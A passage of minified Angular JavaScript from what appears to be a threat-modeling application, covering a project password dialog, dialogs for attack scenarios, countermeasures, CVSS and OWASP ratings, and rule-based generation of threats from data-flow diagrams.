"),m(19,"mat-icon",11),oe(20,"translate"),s(21,"privacy_tip"),u(),s(22,"\n    "),u(),s(23,"\n  "),u()}if(2&t){const e=B();C(2),V("ngModel",e.RemovePassword),C(1),ke(re(4,8,"dialog.save.removePW")),C(8),ke(re(12,10,"dialog.passswordprotection.NewPasword")),C(3),V("disabled",e.RemovePassword)("type",e.ShowChangePassword?"text":"password")("ngModel",e.ChangePassword),C(3),ke(e.ShowChangePassword?"visibility_off":"visibility"),C(2),at("matTooltip",re(20,12,"dialog.save.security"))}}function JPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n    "),m(2,"mat-form-field",8),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",12),he("ngModelChange",function(n){return be(e),Me(B().NewPassword=n)}),u(),s(9,"\n      "),m(10,"mat-icon",10),he("click",function(){be(e);const n=B();return Me(n.ShowNewPassword=!n.ShowNewPassword)}),s(11),u(),s(12,"\n      "),m(13,"mat-icon",11),oe(14,"translate"),s(15,"privacy_tip"),u(),s(16,"\n    "),u(),s(17,"\n  "),u()}if(2&t){const e=B();C(5),ke(re(6,5,"dialog.save.addPW")),C(3),V("type",e.ShowNewPassword?"text":"password")("ngModel",e.NewPassword),C(3),ke(e.ShowNewPassword?"visibility_off":"visibility"),C(2),at("matTooltip",re(14,7,"dialog.save.security"))}}let ZPe=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.dataService=i,this.messageService=n}get HasChanges(){return this.IsEncrypted?this.RemovePassword||!Gi.NullOrEmpty(this.ChangePassword):!Gi.NullOrEmpty(this.NewPassword)}ngOnInit(){this.initalizeProperties()}Change(){this.IsEncrypted?this.RemovePassword?this.dataService.RemovePassword():this.dataService.SetPassword(this.ChangePassword):this.dataService.SetPassword(this.NewPassword),this.messageService.Info("messages.info.changesActiveAfterSaving"),this.initalizeProperties()}initalizeProperties(){this.IsEncrypted=this.dataService.SelectedFile.isEncrypted,this.RemovePassword=!1,this.NewPassword="",this.ShowNewPassword=!1,this.ChangePassword="",this.ShowChangePassword=!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(Yi),Ee(A2))},t.\u0275cmp=Wt({type:t,selectors:[["app-password-protection-dialog"]],decls:31,vars:16,consts:[["mat-dialog-title",""],[2,"margin-bottom","15px"],[2,"vertical-align","bottom"],[4,"ngIf"],["align","end"],["mat-raised-button","","color","primary",3,"disabled","click"],["mat-button","","cdkFocusInitial","",3,"mat-dialog-close"],["color","primary",2,"padding-bottom","10px",3,"ngModel","ngModelChange"],[1,"field-width"],["matInput","",1,"field-width",3,"disabled","type","ngModel","ngModelChange"],["matSuffix","",3,"click"],["matSuffix","",3,"matTooltip"],["matInput","",1,"field-width",3,"type","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),m(6,"div",1),s(7,"\n    "),m(8,"mat-icon",2),s(9),u(),s(10," \n    "),ne(11,KPe,3,3,"ng-container",3),s(12,"\n    "),ne(13,XPe,3,3,"ng-container",3),s(14,"\n  "),u(),s(15,"\n\n  "),ne(16,YPe,24,14,"div",3),s(17,"\n  "),ne(18,JPe,18,9,"div",3),s(19,"\n"),u(),s(20,"\n"),m(21,"mat-dialog-actions",4),s(22,"\n  "),m(23,"button",5),he("click",function(){return i.Change()}),s(24),oe(25,"translate"),u(),s(26,"\n  "),m(27,"button",6),s(28),oe(29,"translate"),u(),s(30,"\n"),u()),2&e&&(C(1),ke(re(2,10,"dialog.passswordprotection.title")),C(8),ke(i.IsEncrypted?"lock":"lock_open_right"),C(2),V("ngIf",i.IsEncrypted),C(2),V("ngIf",!i.IsEncrypted),C(3),V("ngIf",i.IsEncrypted),C(2),V("ngIf",!i.IsEncrypted),C(5),V("disabled",!i.HasChanges),C(1),ke(re(25,12,"dialog.passswordprotection.Change")),C(3),V("mat-dialog-close",!0),C(1),ke(re(29,14,"general.Close")))},dependencies:[Ri,an,Ta,Ea,oa,br,da,nn,un,jr,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".field-width[_ngcontent-%COMP%]{width:355px}"]}),t})();class hf{}class E2{}class S5{}class k5{}class P5{}let Wn=(()=>{class t{constructor(e,i,n,r){this.dialog=e,this.translate=i,this.dataService=n,this.locStorage=r}OpenTwoOptionsDialog(e,i=!1,n=null,r=null){return this.dialog.open(_M,{hasBackdrop:i,data:e,width:n,minWidth:r}).afterClosed()}OpenUnsavedChangesDialog(){const e={title:this.translate.instant("dialog.unsaved.title"),textContent:this.translate.instant("dialog.unsaved.saveProject"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!0};return this.OpenTwoOptionsDialog(e)}OpenDeleteDialog(e){const i={title:this.translate.instant("dialog.delete.deleteItem")+" "+e,textContent:this.translate.instant("dialog.delete.sure"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.OpenTwoOptionsDialog(i)}OpenDeleteObjectDialog(e){let i=MG.FindAllReferencesDeep(e,this.dataService.Project,this.dataService.Config),n=this.translate.instant("dialog.delete.sure");i.length>0&&(n+="\n\n",n+=this.translate.instant("dialog.delete.changes"),i.forEach(c=>{n+="\n"+MG.ToString(c,this.dataService,this.translate)}));const r={title:this.translate.instant("dialog.delete.deleteItem")+" "+e.Name,textContent:n,resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.OpenTwoOptionsDialog(r)}OpenAttackScenarioDialog(e,i,n=null){const r={title:this.translate.instant("pages.modeling.attackscenario.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!i||e.ThreatCategories.length>0,initalTrue:!1,component:lM,componentInputData:[{Key:Rc,Value:e}]};if(n){r.canIterate=!0;let c=e;const d=new Tt;r.componentInputData.push({Key:Tt,Value:d}),r.canNext=()=>n.indexOf(c)<n.length-1,r.canPrevious=()=>n.indexOf(c)>0,r.onNext=()=>{c=n[n.indexOf(c)+1],d.emit(c)},r.onPrevious=()=>{c=n[n.indexOf(c)-1],d.emit(c)}}return this.OpenTwoOptionsDialog(r)}OpenAddAttackVectorDialog(e){const i={title:this.translate.instant("pages.config.attackVectorEditDialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var n;return(null===(n=e.Name)||void 0===n?void 0:n.length)>0&&null!=this.dataService.Config.FindGroupOfAttackVector(e)},initalTrue:!1,component:jg,componentInputData:[{Key:zp,Value:e}]};return this.OpenTwoOptionsDialog(i)}OpenViewAttackVectorDialog(e,i){const n=new hf;n.Value=i;const r={title:this.translate.instant("pages.config.attackVectorViewDialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:jg,componentInputData:[{Key:zp,Value:e},{Key:hf,Value:n}]};return this.OpenTwoOptionsDialog(r,!0)}OpenViewThreatRuleDialog(e){const i={title:this.translate.instant("pages.config.threatRuleViewDialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:qp,componentInputData:[{Key:Fp,Value:e}]};return this.OpenTwoOptionsDialog(i,!0)}OpenCVSSEntryDiaglog(e){const i=new k5;i.Value=e;const n={title:this.translate.instant("shared.cvss.name.l"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:Wm,componentInputData:[{Key:k5,Value:i}]};return this.OpenTwoOptionsDialog(n,!0)}OpenOwaspRREntryDiaglog(e){const i=new P5;i.Value=e;const n={title:this.translate.instant("shared.owasprr.name.l"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:IT,componentInputData:[{Key:P5,Value:i}]};return this.OpenTwoOptionsDialog(n,!0)}OpenAddMyDataDialog(e){const i={title:this.translate.instant("dialog.mydata.addDialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var n;return(null===(n=e.Name)||void 0===n?void 0:n.length)>0&&null!=e.FindAssetGroup()},initalTrue:!1,component:v5,componentInputData:[{Key:Pu,Value:e}]};return this.OpenTwoOptionsDialog(i)}OpenCountermeasureDialog(e,i,n,r=null){let c=new hf;c.Value=i;const d={title:this.translate.instant("pages.modeling.countermeasure.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!i||null!=e.Control||e.Targets.length>0,initalTrue:!1,component:cM,componentInputData:[{Key:Jl,Value:e},{Key:hf,Value:c},{Key:Array,Value:n}]};if(r){d.canIterate=!0;let T=e;const k=new Tt;d.componentInputData.push({Key:Tt,Value:k}),d.canNext=()=>r.indexOf(T)<r.length-1,d.canPrevious=()=>r.indexOf(T)>0,d.onNext=()=>{T=r[r.indexOf(T)+1],k.emit(T)},d.onPrevious=()=>{T=r[r.indexOf(T)-1],k.emit(T)}}return this.OpenTwoOptionsDialog(d,!1,null,"800px")}OpenTestCaseDialog(e,i,n=null){const r={title:this.translate.instant("general.TestCase"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!0,initalTrue:!1,component:gM,componentInputData:[{Key:$g,Value:e}]};if(n){r.canIterate=!0;let c=e;const d=new Tt;r.componentInputData.push({Key:Tt,Value:d}),r.canNext=()=>n.indexOf(c)<n.length-1,r.canPrevious=()=>n.indexOf(c)>0,r.onNext=()=>{c=n[n.indexOf(c)+1],d.emit(c)},r.onPrevious=()=>{c=n[n.indexOf(c)-1],d.emit(c)}}return this.OpenTwoOptionsDialog(r,!1,null,"800px")}OpenAddControlDialog(e){const i=new hf;i.Value=!0;const n={title:this.translate.instant("pages.config.control.dialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var r;return(null===(r=e.Name)||void 0===r?void 0:r.length)>0&&null!=this.dataService.Config.FindGroupOfControl(e)},initalTrue:!1,component:T2,componentInputData:[{Key:Wg,Value:e},{Key:hf,Value:i}]};return this.OpenTwoOptionsDialog(n)}OpenMitigationProcessDialog(e,i){const n={title:this.translate.instant("pages.modeling.mitigationprocess.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!0,initalTrue:!1,component:_T,componentInputData:[{Key:Lp,Value:e}]};return this.OpenTwoOptionsDialog(n)}OpenSuggestThreatsDialog(e){const i={title:this.translate.instant("pages.modeling.diagram.suggestedthreats.dialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1,component:Fke,componentInputData:[{Key:lc,Value:e}]};return this.OpenTwoOptionsDialog(i,!0,"800px")}OpenCveSearchDialog(e,i){let n=new E2;n.Value=i;const r={title:this.translate.instant("shared.cvesearch.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1,component:HG,componentInputData:[{Key:Np,Value:e},{Key:E2,Value:n}]};return this.OpenTwoOptionsDialog(r,!0,"800px")}OpenProgresstrackerDialog(){const e={title:this.translate.instant("dialog.progress.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:WG};return this.OpenTwoOptionsDialog(e)}OpenNotesDialog(e,i=!1,n=!1,r=!1,c=!1){let d=new S5;d.Notes=e,d.HasCheckbox=n,d.ShowTimestamp=i,d.CanToggleTimestamp=r,d.CanToggleCheckbox=c;const T={title:this.translate.instant("general.Notes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:jp,componentInputData:[{Key:S5,Value:d}]};return this.OpenTwoOptionsDialog(T,!0,800)}OpenModelInfoDialog(){const e={title:this.translate.instant("dialog.modelinfo.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:w5};return this.OpenTwoOptionsDialog(e)}OpenModelTasksNotesDialog(){const e={title:this.translate.instant("dialog.modelinfo.title")+": "+this.translate.instant("status-bar.TasksAndNotes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:R5};return this.OpenTwoOptionsDialog(e)}OpenModelChangesDialog(){const e={title:this.translate.instant("dialog.modelinfo.title")+": "+this.translate.instant("dialog.modelchanges.Changes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:qG};return this.OpenTwoOptionsDialog(e)}OpenPasswordProtectionDialog(){return this.dialog.open(ZPe,{hasBackdrop:!1})}OpenCookieConsentDialog(){const e={title:this.translate.instant("dialog.cookie.title"),textContent:this.translate.instant("dialog.cookie.text"),initalTrue:!1,hasResultFalse:!0,resultTrueText:this.translate.instant("dialog.cookie.consent"),resultFalseText:this.translate.instant("dialog.cookie.reject"),resultTrueEnabled:()=>!0},i=this.OpenTwoOptionsDialog(e,!1,"600px");return i.subscribe(n=>{this.locStorage.Set(si.COOKIE_CONSENT,JSON.stringify(n))}),i}OpenGlossaryDialog(){const e={title:this.translate.instant("side-nav.Glossary"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:BPe};return this.OpenTwoOptionsDialog(e)}OpenRenameDialog(e,i){return this.dialog.open(O9e,{data:{Object:e,Property:i}})}OpenTagChartsDialog(){const e={title:this.translate.instant("dialog.tagcharts.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:V9e};return this.OpenTwoOptionsDialog(e,!0,"700px")}OpenViewImageDialog(e,i="700px"){const n=new E2;n.Value=e;const r={title:this.translate.instant("general.Image"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:PPe,componentInputData:[{Key:E2,Value:n}]};return this.OpenTwoOptionsDialog(r,!0,i)}OpenChangelogDialog(){return this.dialog.open(qPe,{hasBackdrop:!0,width:"1000px"}).afterClosed()}}return t.\u0275fac=function(e){return new(e||t)(At(vu),At(Sn),At(Yi),At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),RT=(()=>{class t{constructor(e,i){this.dataService=e,this.dialog=i}GenerateAllThreats(){let e=this.dataService.Project;return e.GetDiagrams().forEach(i=>this.GenerateDiagramThreats(i)),e.GetStacks().forEach(i=>this.GenerateStackThreats(i)),e.GetAttackScenarios()}GenerateDiagramThreats(e){if(!e.Elements)return[];let i=this.dataService.Project;i.GetAttackScenarios().filter(d=>d.ViewID==e.ID&&!d.IsGenerated).forEach(d=>d.MappingState=zn.Stable);let n=i.GetAttackScenarios().filter(d=>d.ViewID==e.ID&&d.IsGenerated);n.forEach(d=>d.RuleStillApplies=!0),n.filter(d=>d.MappingState==zn.Removed).forEach(d=>i.DeleteAttackScenario(d)),n=n.filter(d=>d.MappingState!=zn.Removed);let r=(d,T)=>{let k=d.filter(q=>[nl.EachElement,nl.OnceForEachElement].includes(q.RuleGenerationType));T.forEach(q=>{k.forEach(Y=>{this.checkElementAgainstRule(Y,q,T,e.Settings.GenerationAssetBased).forEach(pe=>{var Re;let Fe=this.checkForExistingMapping(Y,pe.target,Y.RuleGenerationType==nl.EachElement?pe.elements:null);if(Fe){Fe.MappingState=zn.Stable;const Ne=n.findIndex(et=>et.ID==Fe.ID);Ne>=0&&n.splice(Ne,1)}else i.CreateAttackScenario(e.ID,!0).SetMapping(null===(Re=Y.AttackVector)||void 0===Re?void 0:Re.ID,Y.ThreatCategories.map(et=>et.ID),pe.target,pe.elements,Y,null,null,null)})})}),k=d.filter(q=>q.RuleGenerationType==nl.OnceForAllElements),k.forEach(q=>{var Y;let te=[];if(T.forEach(pe=>{this.checkElementAgainstRule(q,pe,T,e.Settings.GenerationAssetBased).forEach(Fe=>te.push(...Fe.elements))}),te.length>0){let pe=this.checkForExistingMapping(q,1==te.length?te[0]:null,te);if(pe||(pe=this.checkForExistingMappingWithUpdatedElements(q,1==te.length?te[0]:null,te),pe&&(pe.Targets=te,pe.GetCountermeasures().forEach(Re=>{let Fe=[];Re.AttackScenarios.forEach(Ne=>{Ne.Targets.forEach(et=>{Fe.includes(et)||Fe.push(et)})}),Re.Targets=Fe}))),pe){pe.MappingState=zn.Stable;const Re=n.findIndex(Fe=>Fe.ID==pe.ID);Re>=0&&n.splice(Re,1)}else i.CreateAttackScenario(e.ID,!0).SetMapping(null===(Y=q.AttackVector)||void 0===Y?void 0:Y.ID,q.ThreatCategories.map(Fe=>Fe.ID),1==te.length?te[0]:null,te,q,null,null,null)}})},c=[];if(e.Settings.GenerationThreatLibrary&&c.push(...this.dataService.Config.GetThreatRules().filter(d=>d.IsActive)),Object.keys(e.Settings.GenerationRules).length>0&&Object.keys(e.Settings.GenerationRules).forEach(d=>{const T=k=>{c.push(...k.ThreatRules),k.SubGroups&&k.SubGroups.forEach(q=>T(q))};T(this.dataService.Config.GetThreatRuleGroup(d))}),[xn.Hardware,xn.DataFlow].includes(e.DiagramType)&&r(c.filter(d=>d.RuleType==on.Stencil),e.Elements.GetChildrenFlat().filter(d=>!d.OutOfScope)),e.DiagramType==xn.DataFlow&&r(c.filter(d=>d.RuleType==on.DFD),e.Elements.GetChildrenFlat().filter(d=>d.GetProperty("Type").ElementTypeID==Et.DataFlow&&!d.OutOfScope)),e.DiagramType==xn.DataFlow&&r(c.filter(d=>d.RuleType==on.Protocol),e.Elements.GetChildrenFlat().filter(d=>d.GetProperty("Type").ElementTypeID==Et.DataFlow&&!d.OutOfScope)),Object.keys(e.Settings.GenerationMnemonics).length>0&&[xn.Hardware,xn.DataFlow].includes(e.DiagramType)){const d=e.Elements.GetChildrenFlat().filter(T=>!T.OutOfScope);Object.keys(e.Settings.GenerationMnemonics).map(T=>this.dataService.Config.GetStencilThreatMnemonic(T)).forEach(T=>{d.forEach(k=>{T.Letters.forEach(q=>{var Y;let te=!0;if(e.Settings.GenerationAssetBased&&(te=!1,k.GetProperty("ProcessedData")&&q.threatCategoryID)){const pe=this.dataService.Config.GetThreatCategory(q.threatCategoryID);te=k.GetProperty("ProcessedData").some(Re=>Re.ImpactCats.some(Fe=>pe.ImpactCats.includes(Fe)))}if(q.AffectedElementTypes.includes(k.Type.ElementTypeID)&&te){const pe=i.GetAttackScenarios().filter(Re=>{var Fe;return(null===(Fe=Re.Target)||void 0===Fe?void 0:Fe.ID)==k.ID}).filter(Re=>Re.ThreatMnemonicLetterID==q.ID);pe.length>0?pe.forEach(Re=>{Re.MappingState=zn.Stable;const Fe=n.findIndex(Ne=>Ne.ID==Re.ID);Fe>=0&&n.splice(Fe,1)}):i.CreateAttackScenario(e.ID,!0).SetMapping(null,[null===(Y=T.GetThreatCategory(q))||void 0===Y?void 0:Y.ID],k,[k],null,null,T,q)}})})})}return n.forEach(d=>{d.ThreatState==_o.NotSet?d.MappingState=zn.Removed:d.RuleStillApplies=!1}),i.GetAttackScenarios().filter(d=>d.ViewID==e.ID)}GenerateStackThreats(e){let i=this.dataService.Project;i.GetAttackScenarios().filter(c=>c.ViewID==e.ID&&!c.IsGenerated).forEach(c=>c.MappingState=zn.Stable);let n=i.GetAttackScenarios().filter(c=>c.ViewID==e.ID&&c.IsGenerated);return n.filter(c=>c.MappingState==zn.Removed).forEach(c=>i.DeleteAttackScenario(c)),n=n.filter(c=>c.MappingState!=zn.Removed),(c=>{c.forEach(d=>{this.dataService.Config.GetThreatRules().filter(T=>T.IsActive&&T.RuleType==on.Component&&T.RuleGenerationType==nl.EachElement).forEach(T=>{this.checkElementAgainstRule(T,d,c,!1).forEach(q=>{var Y;let te=this.checkForExistingMapping(T,q.target,q.elements);if(te){te.MappingState=zn.Stable;const pe=n.findIndex(Re=>Re.ID==te.ID);pe>=0&&n.splice(pe,1)}else{const pe=i.CreateAttackScenario(e.ID,!0);let Re=null;1==T.ComponentRestriction.DetailRestrictions.length&&(Re=i.Config.GetThreatQuestions().find(Fe=>Fe.ComponentType.ID==d.Type.ID&&Fe.Property.ID==T.ComponentRestriction.DetailRestrictions[0].PropertyRest.ID)),pe.SetMapping(null===(Y=T.AttackVector)||void 0===Y?void 0:Y.ID,T.ThreatCategories.map(Fe=>Fe.ID),q.target,q.elements,T,Re,null,null)}})})})})(e.GetChildren().filter(c=>!c.OutOfScope)),n.forEach(c=>{c.ThreatState==_o.NotSet?c.MappingState=zn.Removed:c.RuleStillApplies=!1}),i.GetAttackScenarios().filter(c=>c.ViewID==e.ID)}AddMnemonicThreat(e,i){if(e){let n=this.dataService.Project.FindDiagramOfElement(e.ID),r=this.dataService.Project.CreateAttackScenario(n.ID,!1);r.SetMapping("",[],e,[e],null,null,this.dataService.Config.GetStencilThreatMnemonics().find(d=>d.Letters.some(T=>T.ID==i.ID)),i),r.IsGenerated=!1;const c=this.dialog.OpenAttackScenarioDialog(r,!0);return c.subscribe(d=>{d||this.dataService.Project.DeleteAttackScenario(r)}),c}}checkElementAgainstRule(e,i,n,r){var c;if(e.RuleType==on.DFD){let d=(k,q,Y,te=!0)=>{var pe;const Re=te&&(e.DFDRestriction.AppliesReverse||[wn.Both,wn.Initiator].includes(k.ArrowPos));let Fe=e.DFDRestriction.NodeTypes[q+0],Ne=e.DFDRestriction.NodeTypes[q+1],et=!0;Y||(et&&!this.isCorrectNodeType(Fe,k.Sender)&&(et=!1),et&&!this.isCorrectNodeType(Ne,k.Receiver)&&(et=!1)),(Y||!et&&Re)&&(et=Y=!0,Fe=e.DFDRestriction.NodeTypes[e.DFDRestriction.NodeTypes.length-2-q],Ne=e.DFDRestriction.NodeTypes[e.DFDRestriction.NodeTypes.length-1-q],et&&!this.isCorrectNodeType(Fe,k.Receiver)&&(et=!1),et&&!this.isCorrectNodeType(Ne,k.Sender)&&(et=!1));let ut=null===(pe=e.DFDRestriction)||void 0===pe?void 0:pe.NodeRestrictions;if(et=et&&this.evalRestrictions(ut,e.RuleType,k,q),et&&r&&(et=!1,i.GetProperty("ProcessedData")&&e.ThreatCategories)){let Ze=[];e.ThreatCategories.forEach(yt=>Ze.push(...yt.ImpactCats)),et=i.GetProperty("ProcessedData").some(yt=>yt.ImpactCats.some(It=>Ze.includes(It)))}return[et,Y]};const T=i;if(2!=e.DFDRestriction.NodeTypes.length){let k=[],q=(te,pe,Re,Fe)=>{n.filter(et=>et instanceof rs).filter(et=>{var ut,Ze;return(null===(ut=et.Sender)||void 0===ut?void 0:ut.ID)==te.ID&&(null===(Ze=et.Receiver)||void 0===Ze?void 0:Ze.ID)!=pe[0].ID}).forEach(et=>{const ut=d(et,Re,Fe,!1);if(ut[0]){let Ze=[...pe,et,et.Receiver];Re+2==e.DFDRestriction.NodeTypes.length?k.push({target:te,elements:Ze}):q(et.Receiver,Ze,Re+1,ut[1])}})};const Y=d(T,0,!1);return Y[0]&&q(T.Receiver,[T.Sender,T,T.Receiver],1,Y[1]),k}{const k=d(T,0,!1);if(k[0]){const q=k[1]?1-e.DFDRestriction.Target:e.DFDRestriction.Target;let Y=T;return 0==q?Y=T.Sender:1==q&&(Y=T.Receiver),[{target:Y,elements:[T.Sender,T,T.Receiver]}]}}return[]}{let d=!0;if(e.RuleType==on.Stencil){const k=this.dataService.Config.GetStencilType(e.StencilRestriction.stencilTypeID);d=k.IsDefault?i.GetProperty("Type").ElementTypeID==k.ElementTypeID:i.GetProperty("Type").ID==e.StencilRestriction.stencilTypeID,d=d&&!(i instanceof td||i instanceof zm)}else e.RuleType==on.Component?d=i.Type.ID==e.ComponentRestriction.componentTypeID:e.RuleType==on.Protocol&&(d=i.ProtocolStack.map(k=>k.ID).includes(e.ProtocolRestriction.protocolID));let T=null===(c=e.StencilRestriction)||void 0===c?void 0:c.DetailRestrictions;return e.RuleType==on.Component&&(T=e.ComponentRestriction.DetailRestrictions),d=d&&this.evalRestrictions(T,e.RuleType,i,0),d?[{target:i,elements:[i]}]:[]}}evalRestrictions(e,i,n,r){if(null==e||0==e.length)return!0;let c=Math.max(...e.map(T=>T.Layer)),d=new Array(e.length);for(d.fill(null,0,e.length);c>=0;){let T=-1,k=!1;for(let q=0;q<e.length;q++)if(e[q].Layer==c&&-1==T?T=q:T>=0&&e[q].Layer!=c&&(k=!0),k||T>=0&&q==e.length-1){let Y=e.slice(T,q==e.length-1?q+1:q);d[T]=[c,Y[Y.length-1].IsOR,this.evalRestrictionWindow(Y,i,n,r)],T=-1,k=!1}c-=1}for(d=d.filter(T=>null!=T),c=Math.max(...e.map(T=>T.Layer));c>=0;){for(let T=1;T<d.length;T++)null!=d[T]&&d[T][0]==c&&(d[T-1][2]=d[T-1][1]?d[T-1][2]||d[T][2]:d[T-1][2]&&d[T][2],d.splice(T,1),T--);c-=1}return d=d.filter(T=>null!=T),0!=d.length&&(d.length>1?void console.error("Only one layer should remain"):d[0][2])}evalRestrictionWindow(e,i,n,r){let c=this.evalRestriction(e[0],i,n,r),d=e[0].IsOR;for(let T=1;T<e.length;T++){let k=this.evalRestriction(e[T],i,n,r);c=d?c||k:c&&k,d=e[T].IsOR}return c}evalRestriction(e,i,n,r){if(e.RestType==ya.Property)return[on.Stencil,on.Component].includes(i)||-1==e.NodeNumber?t.EvalProp(e.PropertyRest,n):e.NodeNumber==r+0?t.EvalProp(e.PropertyRest,n.Sender):e.NodeNumber!=r+1||t.EvalProp(e.PropertyRest,n.Receiver);if(e.RestType==ya.DataFlowCrosses){let c=n.Sender.Parent.ID!=n.Receiver.Parent.ID;return c&&e.DataflowRest.TrustAreaIDs.length>0&&(c=e.DataflowRest.TrustAreaIDs.includes(n.Sender.Parent.GetProperty("Type").ID)||e.DataflowRest.TrustAreaIDs.includes(n.Receiver.Parent.GetProperty("Type").ID)),c}return e.RestType==ya.PhysicalElement?i==on.Stencil?t.EvalProp(e.PhyElementRest.Property,n.PhysicalElement):e.NodeNumber==r+0?t.EvalProp(e.PhyElementRest.Property,n.Sender.PhysicalElement):e.NodeNumber==r+1?t.EvalProp(e.PhyElementRest.Property,n.Receiver.PhysicalElement):e.NodeNumber>=r+2:e.RestType==ya.SenderInterface?!!n.SenderInterface&&t.EvalProp(e.SenderInterfaceRestriction.Property,n.SenderInterface):e.RestType==ya.ReceiverInterface?!!n.ReceiverInterface&&t.EvalProp(e.ReceiverInterfaceRestriction.Property,n.ReceiverInterface):void console.error("Unknown path in evalRestriction()",e,i,n,r)}checkForExistingMapping(e,i,n){return this.dataService.Project.GetAttackScenarios().find(r=>{var c,d;let T=(null===(c=r.ThreatRule)||void 0===c?void 0:c.ID)==e.ID&&(null===(d=r.Target)||void 0===d?void 0:d.ID)==(null==i?void 0:i.ID);if(n&&(T=T&&r.Targets.length==n.length,T))for(let k=0;k<n.length;k++)T=T&&n[k].ID==r.Targets[k].ID;return T})}checkForExistingMappingWithUpdatedElements(e,i,n){return this.dataService.Project.GetAttackScenarios().find(r=>{var c,d;let T=(null===(c=r.ThreatRule)||void 0===c?void 0:c.ID)==e.ID&&(null===(d=r.Target)||void 0===d?void 0:d.ID)==(null==i?void 0:i.ID);if(n&&T)if(n.length>r.Targets.length)for(let k=0;k<r.Targets.length;k++)T=T&&n.includes(r.Targets[k]);else for(let k=0;k<n.length;k++)T=T&&r.Targets.includes(n[k]);return T})}isCorrectNodeType(e,i){if(null==e.TypeIDs||0==e.TypeIDs.length)return!0;let n=!1;return e.TypeIDs.forEach(r=>{let c=this.dataService.Config.GetStencilType(r);n=c.IsDefault?n||i.GetProperty("Type").ElementTypeID==c.ElementTypeID:n||c.ID==i.GetProperty("Type").ID}),n}static EvalProp(e,i){if(!e.ID||!i)return!1;let n=i.GetProperty(e.ID);switch(e.ComparisonType){case cc.EqualsNot:return n!=e.Value;case cc.GreaterThan:return n>=e.Value;case cc.LessThan:return n<=e.Value;case cc.GreaterThanOrEquals:return n>=e.Value;case cc.LessThanOrEquals:return n<=e.Value;default:return n==e.Value}}}return t.\u0275fac=function(e){return new(e||t)(At(Yi),At(Wn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var Xg=(()=>{return(t=Xg||(Xg={}))[t.SWComponent=1]="SWComponent",Xg;var t})();class GG{static GetTypes(){return[Xg.SWComponent]}static ToString(a){return a===Xg.SWComponent?"general.SWComponent":(console.error("Missing ReqFulfillRuleTypesUtil.ToString()"),"Undefined")}}class Yg extends Ln{constructor(a,e){super(a),this.config=e,this.Data.subReqTypeIDs||(this.Data.subReqTypeIDs=[]),this.Data.RequiredPerLevel||(this.Data.RequiredPerLevel=[]),this.Data.ReqFulfillRule||(this.Data.ReqFulfillRule={})}get SubReqTypes(){let a=[];return 